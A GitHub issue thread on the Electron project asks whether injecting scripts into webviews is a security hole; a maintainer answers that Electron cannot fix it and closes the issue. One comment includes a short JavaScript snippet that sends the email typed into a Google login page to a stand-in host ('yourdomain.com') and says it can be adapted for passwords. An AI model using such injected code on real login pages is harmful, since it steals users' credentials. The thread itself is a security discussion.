### ISSUE TITLE
issue 2048, isn't this an security hole? webview, inject script

### ISSUE THREAD

**Issue by Elmapul** [electron/electron#7439]
* Electron version: 1.3.5
* Operating system: any

https://github.com/electron/electron/issues/2048

you can add an web viewer and add custom scripts to it, this feature can be tweeked to keylog or steal cokies from the user.

**Comment by enlight** [comment]
Can you clarify what you think the security hole is?

**Comment by Elmapul** [comment]
consider for example, this code:

document.getElementById("next").onclick = function() {steal()};

function steal(){
 var xhttp = new XMLHttpRequest();
var aux = document.getElementById("Email");
var aux2=aux.value;

  xhttp.open("GET", "yourdomain.com/get?v="+aux2, true);
  xhttp.send();


}

at this URL:

https://accounts.google.com/ServiceLogin?passive=1209600&osid=1&continue=https://plus.google.com/collections/featured&followup=https://plus.google.com/collections/featured#identifier

the above code will send whetever the user type as plaintext to an malicious url, in the example i send the e-mail, but it can be used to send passwords too.
i don't know if its a security problem because there is not much that can be done about it, if we fix thsi, anyone can fork electron with an previous version that this work.
the solution seems to be  the end user not trust any unknow program, and type he username and password there..

**Comment by enlight** [comment]
Yes, the user shouldn't trust sketchy browsers, but there's nothing Electron can do about it. Closing this as there's nothing to fix here.
